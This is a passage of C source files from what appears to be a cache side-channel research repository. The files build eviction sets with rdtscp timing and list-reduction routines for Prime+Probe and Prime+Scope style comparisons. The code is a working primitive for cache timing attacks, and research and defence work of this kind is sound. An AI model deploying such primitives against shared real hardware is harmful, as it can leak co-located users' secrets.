 23 |   asm volatile("mfence");
 24 |   return a;
 25 | }
 26 | 
 27 | void memory_access(void *p) { asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax"); }
 28 | 
 29 | void memory_fence() { asm volatile("mfence\n"); }
 30 | 
 31 | int reload_time(void *ptr) {
 32 |   uint64_t start = 0, end = 0;
 33 | 
 34 |   start = rdtsc();
 35 |   memory_access(ptr);
 36 |   end = rdtsc();
 37 | 
 38 |   memory_fence();
 39 | 
 40 |   return (int)(end - start);
 41 | }
 42 | 
 43 | 
 44 | 
 45 | // initialize linked list in evset memory
 46 | // one entry per page at the correct offset!
 47 | static void
 48 | initialize_list(char *start, uint64_t size, uint64_t offset)
 49 | {
 50 | 	uint64_t off = 0;
 51 | 	Elem* last = NULL;
 52 | 	for (off = offset; off < size - sizeof(Elem); off += PAGE_SIZE)
 53 | 	{
 54 | 		Elem* cur = (Elem*)(start + off);
 55 | 		cur->set = -2;
 56 | 		cur->delta = 0;
 57 | 		cur->prev = last;
 58 | 		cur->next = NULL;
 59 | 		if(last){
 60 | 		    last->next = cur;
 61 | 		}
 62 | 		last = cur;
 63 | 	}
 64 | }
 65 | 
 66 | static Elem*
 67 | initialize_list_with_offset(Elem* reference, uint64_t offset){
 68 |     // xor mask to turn offset of reference into offset of 
 69 |     uint64_t xor = ((uint64_t)reference & (PAGE_SIZE - 1)) ^ offset;
 70 |     Elem* last = NULL;
 71 |     Elem* start = (Elem*)((uint64_t)reference ^ xor);
 72 |     while(reference){
 73 |         Elem* cur = (Elem*)((uint64_t)reference ^ xor);
 74 |         cur->set = -2;
 75 |         cur->delta = 0;
 76 |         cur->prev = last;
 77 |         cur->next = NULL;
 78 |         if(last){
 79 |             last->next = cur;
 80 |         } 
 81 |         last = cur;
 82 |         reference = reference->next;
 83 |     }
 84 |     
 85 |     return start;
 86 | }
 87 | 
 88 | Elem* evset_find(void* addr){
 89 | 
 90 |     uint64_t offset = (PAGE_SIZE - 1) & (uint64_t)addr & ~((1 << 6) - 1);
 91 |     
 92 |     Elem* start;
 93 | 
 94 |     // map memory
 95 |     char* memory_chunk = (char*) mmap (NULL, EVICTION_MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0);
 96 | 
 97 |     if(!memory_chunk){
 98 |         printf("MMAP FAILED\n");
 99 |     }
100 | 
101 |     // initialize list
102 |     start = (Elem*)(void*)(memory_chunk + offset);
103 |     initialize_list(memory_chunk, EVICTION_MEMORY_SIZE, offset);
104 | 
105 | 
106 |     // reduce list
107 |     Elem* can = NULL;
108 |     int retries = 0;
109 |     while(gt_eviction(&start, &can, addr)){
110 |         printf("finding eviction set failed!\n");
111 |         if(retries > 20){
112 |             printf("max retries exceeded!\n");
113 |             break;
114 |         }
115 |         // unmap memory chunk
116 |         munmap(memory_chunk, EVICTION_MEMORY_SIZE);
117 |         // map new memory chunk
118 |         memory_chunk = (char*) mmap (NULL, EVICTION_MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0);
119 |         start = (Elem*)(void*)(memory_chunk + offset);
120 |         initialize_list(memory_chunk, EVICTION_MEMORY_SIZE, offset);
121 |         can = NULL;
122 |         retries ++;
123 |     }
124 |     if(retries < 20){
125 |         printf("Eviction set found!\n");
126 |     }
127 | 
128 |     // unmap memory that is no longer needed
129 |     while(can){
130 |         Elem* next = can->next;
131 |         if(munmap((void*)((uint64_t)can & (~(PAGE_SIZE-1))), PAGE_SIZE)){
132 |             printf("munmap failed!\n");
133 |         }
134 |         can = next;
135 |     }
136 |  
137 |     // magic!
138 |     return  start;
139 |     
140 | }
141 | 
142 | 
143 | #define ROUNDS 50
144 | #define MAX_BACKTRACK 50
145 | 
146 | int
147 | list_length(Elem *ptr)
148 | {
149 | 	int l = 0;
150 | 	while (ptr)
151 | 	{
152 | 		l = l + 1;
153 | 		ptr = ptr->next;
154 | 	}
155 | 	return l;
156 | }
157 | 
158 | void
159 | list_concat(Elem **ptr, Elem *chunk)
160 | {
161 | 	Elem *tmp = (ptr) ? *ptr : NULL;
162 | 	if (!tmp)
163 | 	{
164 | 		*ptr = chunk;
165 | 		return;
166 | 	}
167 | 	while (tmp->next != NULL)
168 | 	{
169 | 		tmp = tmp->next;
170 | 	}
171 | 	tmp->next = chunk;
172 | 	if (chunk)
173 | 	{
174 | 		chunk->prev = tmp;
175 | 	}
176 | }
177 | 
178 | void
179 | list_split(Elem *ptr, Elem **chunks, int n)
180 | {
181 | 	if (!ptr)
182 | 	{
183 | 		return;
184 | 	}
185 | 	int len = list_length (ptr), k = len / n, i = 0, j = 0;
186 | 	while (j < n)
187 | 	{
188 | 		i = 0;
189 | 		chunks[j] = ptr;
190 | 		if (ptr)
191 | 		{
192 | 			ptr->prev = NULL;
193 | 		}
194 | 		while (ptr != NULL && ((++i < k) || (j == n-1)))
195 | 		{
196 | 			ptr = ptr->next;
197 | 		}
198 | 		if (ptr)
199 | 		{
200 | 			ptr = ptr->next;
201 | 			if (ptr && ptr->prev) {
202 | 				ptr->prev->next = NULL;
203 | 			}
204 | 		}
205 | 		j++;
206 | 	}
207 | }
208 | 
209 | void
210 | list_from_chunks(Elem **ptr, Elem **chunks, int avoid, int len)
211 | {
212 | 	int next = (avoid + 1) % len;
213 | 	if (!(*ptr) || !chunks || !chunks[next])
214 | 	{
215 | 		return;
216 | 	}
217 | 	// Disconnect avoided chunk
218 | 	Elem *tmp = chunks[avoid];
219 | 	if (tmp) {
220 | 		tmp->prev = NULL;
221 | 	}
222 | 	while (tmp && tmp->next != NULL && tmp->next != chunks[next])
223 | 	{
224 | 		tmp = tmp->next;
225 | 	}
226 | 	if (tmp)
227 | 	{
228 | 		tmp->next = NULL;
229 | 	}
230 | 	// Link rest starting from next
231 | 	tmp = *ptr = chunks[next];
232 | 	if (tmp)
233 | 	{
234 | 		tmp->prev = NULL;
235 | 	}
236 | 	while (next != avoid && chunks[next] != NULL)
237 | 	{
238 | 		next = (next + 1) % len;
239 | 		while (tmp && tmp->next != NULL && tmp->next != chunks[next])
240 | 		{
241 | 			if (tmp->next)
242 | 			{
243 | 				tmp->next->prev = tmp;
244 | 			}
245 | 			tmp = tmp->next;
246 | 		}
247 | 		if (tmp)
248 | 		{
249 | 			tmp->next = chunks[next];
250 | 		}
251 | 		if (chunks[next])
252 | 		{
253 | 			chunks[next]->prev = tmp;
254 | 		}
255 | 	}
256 | 	if (tmp)
257 | 	{
258 | 		tmp->next = NULL;
259 | 	}
260 | }
261 | 
262 | void
263 | shuffle(int *array, size_t n)
264 | {
265 | 	size_t i;
266 | 	if (n > 1)
267 | 	{
268 | 		for (i = 0; i < n - 1; i++)
269 | 		{
270 | 			size_t j = i + rand() / (RAND_MAX / (n - i) + 1);
271 | 			int t = array[j];
272 | 			array[j] = array[i];
273 | 			array[i] = t;
274 | 		}
275 | 	}
276 | }
277 | 
278 | /*
279 |  * D012_S2 - Generated from PRIME+SCOPE/primetime
280 |  *
281 |  
282 |  void traverse_D012_S2(uint64_t* arr) {
283 |   int i;
284 |   for(i=0; i<13; i+=2) {
285 |     maccess((void *) arr[i+3]);
286 |     maccess((void *) arr[i+2]);
287 |     maccess((void *) arr[  0]);
288 |     maccess((void *) arr[i+1]);
289 |   }
290 | }
291 |  
292 |  */
293 | 
294 | void
295 | traverser(Elem *arg)
296 | {
297 | 	Elem *ptr = arg;
298 | 	while (ptr && ptr->next && ptr->next->next && ptr->next->next->next)
299 | 	{
300 | 		memory_access (ptr->next->next->next);
301 | 		memory_access (ptr->next->next);
302 | 		memory_access (arg);
303 | 		memory_access (ptr->next);
304 | 
305 | 		ptr = ptr->next->next;
306 | 	}
307 | }
308 | 
309 | int
310 | test_set(Elem *ptr, char *victim)
311 | {
312 |     // page walk
313 | 	memory_access (victim);
314 | 	memory_access (victim);
315 | 
316 | 	memory_fence();
317 | 	traverser(ptr);
318 | 	traverser(ptr);
319 |         
320 | 	return reload_time(victim);
321 | }
322 | 
323 | int
324 | tests_avg(Elem *ptr, char *victim, int rep)
325 | {
326 | 	int i = 0, ret =0;
327 | 	unsigned int delta = 0;
328 | 	unsigned int delta_d = 0;
329 | 	for (i=0; i < rep; i++)
330 | 	{
331 | 		delta = test_set (ptr, victim);
332 | 
333 |         	// remove noise
334 | 		if (delta < 800) {
335 | 			delta_d += delta;
336 | 		}
337 | 	}
338 | 	ret = (float)delta_d / rep;
339 | 	return ret > EVICTION_THRESHOLD;
340 | }
341 | 
342 | int
343 | gt_eviction(Elem **ptr, Elem **can, char *victim)
344 | {
345 | 	// Random chunk selection
346 | 	Elem **chunks = (Elem**) calloc (EVICTION_SET_SIZE + 1, sizeof (Elem*));
347 | 	if (!chunks)
348 | 	{
349 |         printf("Could not allocate chunks!\n");
350 | 		return 1;
351 | 	}
352 | 	int *ichunks = (int*) calloc (EVICTION_SET_SIZE + 1, sizeof (int)), i;
353 | 	if (!ichunks)
354 | 	{
355 | 		printf("Could not allocate ichunks!\n");
356 | 		free (chunks);
357 | 		return 1;
358 | 	}
359 | 
360 | 	int len = list_length(*ptr);
361 | 	int cans = 0;
362 | 
363 | 	// Calculate length: h = log(a/(a+1), a/n)
364 | 	double sz = (double)EVICTION_SET_SIZE / len;
365 | 	double rate = (double)EVICTION_SET_SIZE / (EVICTION_SET_SIZE + 1);
366 | 	int h = ceil(log(sz) / log(rate)), l = 0;
367 | 
368 | 	// Backtrack record
369 | 	Elem **back = (Elem**) calloc (h * 2, sizeof (Elem*));
370 | 	if (!back)
371 | 	{
372 | 		printf("Could not allocate back (%d, %f, %f, %d)!\n", h, sz, rate, list_length(*ptr));
373 | 		free (chunks);
374 | 		free (ichunks);
375 | 		return 1;
376 | 	}
377 | 
378 | 	int repeat = 0;
379 | 	do {
380 | 
381 | 		for (i=0; i < EVICTION_SET_SIZE + 1; i++)
382 | 		{
383 | 			ichunks[i] = i;
384 | 		}
385 | 		shuffle (ichunks, EVICTION_SET_SIZE + 1);
386 | 
387 | 		// Reduce
388 | 		while (len > EVICTION_SET_SIZE)
389 | 		{
390 | 
391 | 			list_split (*ptr, chunks, EVICTION_SET_SIZE + 1);
392 | 			int n = 0, ret = 0;
393 | 
394 | 			// Try paths
395 | 			do
396 | 			{
397 | 				list_from_chunks (ptr, chunks, ichunks[n], EVICTION_SET_SIZE + 1);
398 | 				n = n + 1;
399 | 				ret = tests_avg (*ptr, victim, ROUNDS);
400 | 			}
401 | 			while (!ret && (n < EVICTION_SET_SIZE + 1));
402 | 
403 | 			// If find smaller eviction set remove chunk
404 | 			if (ret && n <= EVICTION_SET_SIZE)
405 | 			{
406 | 				back[l] = chunks[ichunks[n-1]]; // store ptr to discarded chunk
407 | 				cans += list_length (back[l]); // add length of removed chunk
408 | 				len = list_length (*ptr);
409 | 				l = l + 1; // go to next lvl
410 | 			}
411 | 			// Else, re-add last removed chunk and try again
412 | 			else if (l > 0)
413 | 			{
414 | 				list_concat (ptr, chunks[ichunks[n-1]]); // recover last case
415 | 				l = l - 1;
416 | 				cans -= list_length (back[l]);
417 | 				list_concat (ptr, back[l]);
418 | 				back[l] = NULL;
419 | 				len = list_length (*ptr);
420 | 				goto mycont;
421 | 			}
422 | 			else
423 | 			{
424 | 				list_concat (ptr, chunks[ichunks[n-1]]); // recover last case
425 | 				break;
426 | 			}
427 | 		}
428 | 
429 | 		break;
430 | 		mycont:
431 | 		;
432 | 
433 | 	} while (l > 0 && repeat++ < MAX_BACKTRACK);
434 | 
435 | 	// recover discarded elements
436 | 	for (i = 0; i < h * 2; i++)
437 | 	{
438 | 		list_concat (can, back[i]);
439 | 	}
440 | 
441 | 	free (chunks);
442 | 	free (ichunks);
443 | 	free (back);
444 | 
445 |     int ret = 0;
446 |     
447 |     ret = tests_avg (*ptr, victim, ROUNDS);
448 |     
449 |     if (ret)
450 | 	{
451 | 		if (len > EVICTION_SET_SIZE)
452 | 		{
453 | 			return 1;
454 | 		}
455 | 	}
456 | 	else
457 | 	{
458 | 		return 1;
459 | 	}
460 | 
461 | 	return 0;
462 | }
463 | 


--------------------------------------------------------------------------------
/comparison/ps/eviction.c:
--------------------------------------------------------------------------------
  1 | #include <inttypes.h>
  2 | #include <stdlib.h>
  3 | #include <time.h>
  4 | #include <sys/mman.h>
  5 | #include <stdio.h>
  6 | #include <math.h>
  7 | 
  8 | #include "eviction.h"
  9 | 
 10 | #define EVICTION_THRESHOLD 255
 11 | #define EVICTION_MEMORY_SIZE 32*1024*1024
 12 | #define EVICTION_SET_SIZE 16
 13 | #define PAGE_SIZE (1 << 12)
 14 | 
 15 | int
 16 | gt_eviction(Elem **ptr, Elem **can, char *victim);
 17 | 
 18 | static uint64_t rdtsc() {
 19 |   uint64_t a, d;
 20 |   asm volatile("mfence");
 21 |   asm volatile("rdtscp" : "=a"(a), "=d"(d) :: "rcx");
 22 |   a = (d << 32) | a;
 23 |   asm volatile("mfence");
 24 |   return a;
 25 | }
 26 | 
 27 | void memory_access(void *p) { asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax"); }
 28 | 
 29 | void memory_fence() { asm volatile("mfence\n"); }
 30 | 
 31 | int reload_time(void *ptr) {
 32 |   uint64_t start = 0, end = 0;
 33 | 
 34 |   start = rdtsc();
 35 |   memory_access(ptr);
 36 |   end = rdtsc();
 37 | 
 38 |   memory_fence();
 39 | 
 40 |   return (int)(end - start);
 41 | }
 42 | 
 43 | 
 44 | 
 45 | // initialize linked list in evset memory
 46 | // one entry per page at the correct offset!
 47 | static void
 48 | initialize_list(char *start, uint64_t size, uint64_t offset)
 49 | {
 50 | 	uint64_t off = 0;
 51 | 	Elem* last = NULL;
 52 | 	for (off = offset; off < size - sizeof(Elem); off += PAGE_SIZE)
 53 | 	{
 54 | 		Elem* cur = (Elem*)(start + off);
 55 | 		cur->set = -2;
 56 | 		cur->delta = 0;
 57 | 		cur->prev = last;
 58 | 		cur->next = NULL;
 59 | 		if(last){
 60 | 		    last->next = cur;
 61 | 		}
 62 | 		last = cur;
 63 | 	}
 64 | }
 65 | 
 66 | static Elem*
 67 | initialize_list_with_offset(Elem* reference, uint64_t offset){
 68 |     // xor mask to turn offset of reference into offset of 
 69 |     uint64_t xor = ((uint64_t)reference & (PAGE_SIZE - 1)) ^ offset;
 70 |     Elem* last = NULL;
 71 |     Elem* start = (Elem*)((uint64_t)reference ^ xor);
 72 |     while(reference){
 73 |         Elem* cur = (Elem*)((uint64_t)reference ^ xor);
 74 |         cur->set = -2;
 75 |         cur->delta = 0;
 76 |         cur->prev = last;
 77 |         cur->next = NULL;
 78 |         if(last){
 79 |             last->next = cur;
 80 |         } 
 81 |         last = cur;
 82 |         reference = reference->next;
 83 |     }
 84 |     
 85 |     return start;
 86 | }
 87 | 
 88 | Elem* evset_find(void* addr){
 89 | 
 90 |     uint64_t offset = (PAGE_SIZE - 1) & (uint64_t)addr & ~((1 << 6) - 1);
 91 |     
 92 |     Elem* start;
 93 | 
 94 |     // map memory
 95 |     char* memory_chunk = (char*) mmap (NULL, EVICTION_MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0);
 96 | 
 97 |     if(!memory_chunk){
 98 |         printf("MMAP FAILED\n");
 99 |     }
100 | 
101 |     // initialize list
102 |     start = (Elem*)(void*)(memory_chunk + offset);
103 |     initialize_list(memory_chunk, EVICTION_MEMORY_SIZE, offset);
104 | 
105 | 
106 |     // reduce list
107 |     Elem* can = NULL;
108 |     int retries = 0;
109 |     while(gt_eviction(&start, &can, addr)){
110 |         printf("finding eviction set failed!\n");
111 |         if(retries > 20){
112 |             printf("max retries exceeded!\n");
113 |             break;
114 |         }
115 |         // unmap memory chunk
116 |         munmap(memory_chunk, EVICTION_MEMORY_SIZE);
117 |         // map new memory chunk
118 |         memory_chunk = (char*) mmap (NULL, EVICTION_MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0);
119 |         start = (Elem*)(void*)(memory_chunk + offset);
120 |         initialize_list(memory_chunk, EVICTION_MEMORY_SIZE, offset);
121 |         can = NULL;
122 |         retries ++;
123 |     }
124 |     if(retries < 20){
125 |         printf("Eviction set found!\n");
126 |     }
127 | 
128 |     // unmap memory that is no longer needed
129 |     while(can){
130 |         Elem* next = can->next;
131 |         if(munmap((void*)((uint64_t)can & (~(PAGE_SIZE-1))), PAGE_SIZE)){
132 |             printf("munmap failed!\n");
133 |         }
134 |         can = next;
135 |     }
136 |  
137 |     // magic!
138 |     return  start;
139 |     
140 | }
141 | 
142 | 
143 | #define ROUNDS 50
144 | #define MAX_BACKTRACK 50
145 | 
146 | int
147 | list_to_array(Elem *ptr, uint64_t *array)
148 | {
149 | 	int l = 0;
150 | 	int index=0;
151 | 	while (ptr)
152 | 	{
153 | 		array[index++] = (uint64_t)ptr;
154 | 		l = l + 1;
155 | 		ptr = ptr->next;
156 | 	}
157 | 	return l;
158 | }
159 | 
160 | int
161 | list_length(Elem *ptr)
162 | {
163 | 	int l = 0;
164 | 	while (ptr)
165 | 	{
166 | 		l = l + 1;
167 | 		ptr = ptr->next;
168 | 	}
169 | 	return l;
170 | }
171 | 
172 | void
173 | list_concat(Elem **ptr, Elem *chunk)
174 | {
175 | 	Elem *tmp = (ptr) ? *ptr : NULL;
176 | 	if (!tmp)
177 | 	{
178 | 		*ptr = chunk;
179 | 		return;
180 | 	}
181 | 	while (tmp->next != NULL)
182 | 	{
183 | 		tmp = tmp->next;
184 | 	}
185 | 	tmp->next = chunk;
186 | 	if (chunk)
187 | 	{
188 | 		chunk->prev = tmp;
189 | 	}
190 | }
191 | 
192 | void
193 | list_split(Elem *ptr, Elem **chunks, int n)
194 | {
195 | 	if (!ptr)
196 | 	{
197 | 		return;
198 | 	}
199 | 	int len = list_length (ptr), k = len / n, i = 0, j = 0;
200 | 	while (j < n)
201 | 	{
202 | 		i = 0;
203 | 		chunks[j] = ptr;
204 | 		if (ptr)
205 | 		{
206 | 			ptr->prev = NULL;
207 | 		}
208 | 		while (ptr != NULL && ((++i < k) || (j == n-1)))
209 | 		{
210 | 			ptr = ptr->next;
211 | 		}
212 | 		if (ptr)
213 | 		{
214 | 			ptr = ptr->next;
215 | 			if (ptr && ptr->prev) {
216 | 				ptr->prev->next = NULL;
217 | 			}
218 | 		}
219 | 		j++;
220 | 	}
221 | }
222 | 
223 | void
224 | list_from_chunks(Elem **ptr, Elem **chunks, int avoid, int len)
225 | {
226 | 	int next = (avoid + 1) % len;
227 | 	if (!(*ptr) || !chunks || !chunks[next])
228 | 	{
229 | 		return;
230 | 	}
231 | 	// Disconnect avoided chunk
232 | 	Elem *tmp = chunks[avoid];
233 | 	if (tmp) {
234 | 		tmp->prev = NULL;
235 | 	}
236 | 	while (tmp && tmp->next != NULL && tmp->next != chunks[next])
237 | 	{
238 | 		tmp = tmp->next;
239 | 	}
240 | 	if (tmp)
241 | 	{
242 | 		tmp->next = NULL;
243 | 	}
244 | 	// Link rest starting from next
245 | 	tmp = *ptr = chunks[next];
246 | 	if (tmp)
247 | 	{
248 | 		tmp->prev = NULL;
249 | 	}
250 | 	while (next != avoid && chunks[next] != NULL)
251 | 	{
252 | 		next = (next + 1) % len;
253 | 		while (tmp && tmp->next != NULL && tmp->next != chunks[next])
254 | 		{
255 | 			if (tmp->next)
256 | 			{
257 | 				tmp->next->prev = tmp;
258 | 			}
259 | 			tmp = tmp->next;
260 | 		}
261 | 		if (tmp)
262 | 		{
263 | 			tmp->next = chunks[next];
264 | 		}
265 | 		if (chunks[next])
266 | 		{
267 | 			chunks[next]->prev = tmp;
268 | 		}
269 | 	}
270 | 	if (tmp)
271 | 	{
272 | 		tmp->next = NULL;
273 | 	}
274 | }
275 | 
276 | void
277 | shuffle(int *array, size_t n)
278 | {
279 | 	size_t i;
280 | 	if (n > 1)
281 | 	{
282 | 		for (i = 0; i < n - 1; i++)
283 | 		{
284 | 			size_t j = i + rand() / (RAND_MAX / (n - i) + 1);
285 | 			int t = array[j];
286 | 			array[j] = array[i];
287 | 			array[i] = t;
288 | 		}
289 | 	}
290 | }
291 | 
292 | /*
293 |  * D012_S2 - Generated from PRIME+SCOPE/primetime
294 |  *
295 |  
296 |  void traverse_D012_S2(uint64_t* arr) {
297 |   int i;
298 |   for(i=0; i<13; i+=2) {
299 |     maccess((void *) arr[i+3]);
300 |     maccess((void *) arr[i+2]);
301 |     maccess((void *) arr[  0]);
302 |     maccess((void *) arr[i+1]);
303 |   }
304 | }
305 |  
306 |  */
307 | 
308 | void
309 | traverser(Elem *arg)
310 | {
311 | 	Elem *ptr = arg;
312 | 	while (ptr && ptr->next && ptr->next->next && ptr->next->next->next)
313 | 	{
314 | 		memory_access (ptr->next->next->next);
315 | 		memory_access (ptr->next->next);
316 | 		memory_access (arg);
317 | 		memory_access (ptr->next);
318 | 
319 | 		ptr = ptr->next->next;
320 | 	}
321 | }
322 | 
323 | int
324 | test_set(Elem *ptr, char *victim)
325 | {
326 |     // page walk
327 | 	memory_access (victim);
328 | 	memory_access (victim);
329 | 
330 | 	memory_fence();
331 | 	traverser(ptr);
332 | 	traverser(ptr);
333 |         
334 | 	return reload_time(victim);
335 | }
336 | 
337 | int
338 | tests_avg(Elem *ptr, char *victim, int rep)
339 | {
340 | 	int i = 0, ret =0;
341 | 	unsigned int delta = 0;
342 | 	unsigned int delta_d = 0;
343 | 	for (i=0; i < rep; i++)
344 | 	{
345 | 		delta = test_set (ptr, victim);
346 | 
347 |         	// remove noise
348 | 		if (delta < 800) {
349 | 			delta_d += delta;
350 | 		}
351 | 	}
352 | 	ret = (float)delta_d / rep;
353 | 	return ret > EVICTION_THRESHOLD;
354 | }
355 | 
356 | int
357 | gt_eviction(Elem **ptr, Elem **can, char *victim)
358 | {
359 | 	// Random chunk selection
360 | 	Elem **chunks = (Elem**) calloc (EVICTION_SET_SIZE + 1, sizeof (Elem*));
361 | 	if (!chunks)
362 | 	{
363 |         printf("Could not allocate chunks!\n");
364 | 		return 1;
365 | 	}
366 | 	int *ichunks = (int*) calloc (EVICTION_SET_SIZE + 1, sizeof (int)), i;
367 | 	if (!ichunks)
368 | 	{
369 | 		printf("Could not allocate ichunks!\n");
370 | 		free (chunks);
371 | 		return 1;
372 | 	}
373 | 
374 | 	int len = list_length(*ptr);
375 | 	int cans = 0;
376 | 
377 | 	// Calculate length: h = log(a/(a+1), a/n)
378 | 	double sz = (double)EVICTION_SET_SIZE / len;
379 | 	double rate = (double)EVICTION_SET_SIZE / (EVICTION_SET_SIZE + 1);
380 | 	int h = ceil(log(sz) / log(rate)), l = 0;
381 | 
382 | 	// Backtrack record
383 | 	Elem **back = (Elem**) calloc (h * 2, sizeof (Elem*));
384 | 	if (!back)
385 | 	{
386 | 		printf("Could not allocate back (%d, %f, %f, %d)!\n", h, sz, rate, list_length(*ptr));
387 | 		free (chunks);
388 | 		free (ichunks);
389 | 		return 1;
390 | 	}
391 | 
392 | 	int repeat = 0;
393 | 	do {
394 | 
395 | 		for (i=0; i < EVICTION_SET_SIZE + 1; i++)
396 | 		{
397 | 			ichunks[i] = i;
398 | 		}
399 | 		shuffle (ichunks, EVICTION_SET_SIZE + 1);
400 | 
401 | 		// Reduce
402 | 		while (len > EVICTION_SET_SIZE)
403 | 		{
404 | 
405 | 			list_split (*ptr, chunks, EVICTION_SET_SIZE + 1);
406 | 			int n = 0, ret = 0;
407 | 
408 | 			// Try paths
409 | 			do
410 | 			{
411 | 				list_from_chunks (ptr, chunks, ichunks[n], EVICTION_SET_SIZE + 1);
412 | 				n = n + 1;
413 | 				ret = tests_avg (*ptr, victim, ROUNDS);
414 | 			}
415 | 			while (!ret && (n < EVICTION_SET_SIZE + 1));
416 | 
417 | 			// If find smaller eviction set remove chunk
418 | 			if (ret && n <= EVICTION_SET_SIZE)
419 | 			{
420 | 				back[l] = chunks[ichunks[n-1]]; // store ptr to discarded chunk
421 | 				cans += list_length (back[l]); // add length of removed chunk
422 | 				len = list_length (*ptr);
423 | 				l = l + 1; // go to next lvl
424 | 			}
425 | 			// Else, re-add last removed chunk and try again
426 | 			else if (l > 0)
427 | 			{
428 | 				list_concat (ptr, chunks[ichunks[n-1]]); // recover last case
429 | 				l = l - 1;
430 | 				cans -= list_length (back[l]);
431 | 				list_concat (ptr, back[l]);
432 | 				back[l] = NULL;
433 | 				len = list_length (*ptr);
434 | 				goto mycont;
435 | 			}
436 | 			else
437 | 			{
438 | 				list_concat (ptr, chunks[ichunks[n-1]]); // recover last case
439 | 				break;
440 | 			}
441 | 		}
442 | 
443 | 		break;
444 | 		mycont:
445 | 		;
446 | 
447 | 	} while (l > 0 && repeat++ < MAX_BACKTRACK);
448 | 
449 | 	// recover discarded elements
450 | 	for (i = 0; i < h * 2; i++)
451 | 	{
452 | 		list_concat (can, back[i]);
453 | 	}
454 | 
455 | 	free (chunks);
456 | 	free (ichunks);
457 | 	free (back);
458 | 
459 |     int ret = 0;
460 |     
461 |     ret = tests_avg (*ptr, victim, ROUNDS);
462 |     
463 |     if (ret)
464 | 	{
465 | 		if (len > EVICTION_SET_SIZE)
466 | 		{
467 | 			return 1;
468 | 		}
469 | 	}
470 | 	else
471 | 	{
472 | 		return 1;
473 | 	}
474 | 
475 | 	return 0;
476 | }
477 | 


--------------------------------------------------------------------------------
/comparison/pp/eviction.c:
--------------------------------------------------------------------------------
  1 | #include <inttypes.h>
  2 | #include <stdlib.h>
  3 | #include <time.h>
  4 | #include <sys/mman.h>
  5 | #include <stdio.h>
  6 | #include <math.h>
  7 | 
  8 | #include "eviction.h"
  9 | 
 10 | #define EVICTION_THRESHOLD 255
 11 | #define EVICTION_MEMORY_SIZE 32*1024*1024
 12 | #define EVICTION_SET_SIZE 16
 13 | #define PAGE_SIZE (1 << 12)
 14 | 
 15 | int
 16 | gt_eviction(Elem **ptr, Elem **can, char *victim);
 17 | 
 18 | static uint64_t rdtsc() {
 19 |   uint64_t a, d;
 20 |   asm volatile("mfence");
 21 |   asm volatile("rdtscp" : "=a"(a), "=d"(d) :: "rcx");
 22 |   a = (d << 32) | a;
 23 |   asm volatile("mfence");
 24 |   return a;
 25 | }
 26 | 
 27 | void memory_access(void *p) { asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax"); }
 28 | 
 29 | void memory_fence() { asm volatile("mfence\n"); }
 30 | 
 31 | int reload_time(void *ptr) {
 32 |   uint64_t start = 0, end = 0;
 33 | 
 34 |   start = rdtsc();
 35 |   memory_access(ptr);
 36 |   end = rdtsc();
 37 | 
 38 |   memory_fence();
 39 | 
 40 |   return (int)(end - start);
 41 | }
 42 | 
 43 | 
 44 | 
 45 | // initialize linked list in evset memory
 46 | // one entry per page at the correct offset!
 47 | static void
 48 | initialize_list(char *start, uint64_t size, uint64_t offset)
 49 | {
 50 | 	uint64_t off = 0;
 51 | 	Elem* last = NULL;
 52 | 	for (off = offset; off < size - sizeof(Elem); off += PAGE_SIZE)
 53 | 	{
 54 | 		Elem* cur = (Elem*)(start + off);
 55 | 		cur->set = -2;
 56 | 		cur->delta = 0;
 57 | 		cur->prev = last;
 58 | 		cur->next = NULL;
 59 | 		if(last){
 60 | 		    last->next = cur;
 61 | 		}
 62 | 		last = cur;
 63 | 	}
 64 | }
 65 | 
 66 | static Elem*
 67 | initialize_list_with_offset(Elem* reference, uint64_t offset){
 68 |     // xor mask to turn offset of reference into offset of 
 69 |     uint64_t xor = ((uint64_t)reference & (PAGE_SIZE - 1)) ^ offset;
 70 |     Elem* last = NULL;
 71 |     Elem* start = (Elem*)((uint64_t)reference ^ xor);
 72 |     while(reference){
 73 |         Elem* cur = (Elem*)((uint64_t)reference ^ xor);
 74 |         cur->set = -2;
 75 |         cur->delta = 0;
 76 |         cur->prev = last;
 77 |         cur->next = NULL;
 78 |         if(last){
 79 |             last->next = cur;
 80 |         } 
 81 |         last = cur;
 82 |         reference = reference->next;
 83 |     }
 84 |     
 85 |     return start;
 86 | }
 87 | 
 88 | Elem* evset_find(void* addr){
 89 | 
 90 |     uint64_t offset = (PAGE_SIZE - 1) & (uint64_t)addr & ~((1 << 6) - 1);
 91 |     
 92 |     Elem* start;
 93 | 
 94 |     // map memory
 95 |     char* memory_chunk = (char*) mmap (NULL, EVICTION_MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0);
 96 | 
 97 |     if(!memory_chunk){
 98 |         printf("MMAP FAILED\n");
 99 |     }
100 | 
101 |     // initialize list
102 |     start = (Elem*)(void*)(memory_chunk + offset);
103 |     initialize_list(memory_chunk, EVICTION_MEMORY_SIZE, offset);
104 | 
105 | 
106 |     // reduce list
107 |     Elem* can = NULL;
108 |     int retries = 0;
109 |     while(gt_eviction(&start, &can, addr)){
110 |         printf("finding eviction set failed!\n");
111 |         if(retries > 20){
112 |             printf("max retries exceeded!\n");
113 |             break;
114 |         }
115 |         // unmap memory chunk
116 |         munmap(memory_chunk, EVICTION_MEMORY_SIZE);
117 |         // map new memory chunk
118 |         memory_chunk = (char*) mmap (NULL, EVICTION_MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0);
119 |         start = (Elem*)(void*)(memory_chunk + offset);
120 |         initialize_list(memory_chunk, EVICTION_MEMORY_SIZE, offset);
121 |         can = NULL;
122 |         retries ++;
123 |     }
124 |     if(retries < 20){
125 |         printf("Eviction set found!\n");
126 |     }
127 | 
128 |     // unmap memory that is no longer needed
129 |     while(can){
130 |         Elem* next = can->next;
131 |         if(munmap((void*)((uint64_t)can & (~(PAGE_SIZE-1))), PAGE_SIZE)){
132 |             printf("munmap failed!\n");
133 |         }
134 |         can = next;
135 |     }
136 |  
137 |     // magic!
138 |     return  start;
139 |     
140 | }
141 | 
142 | 
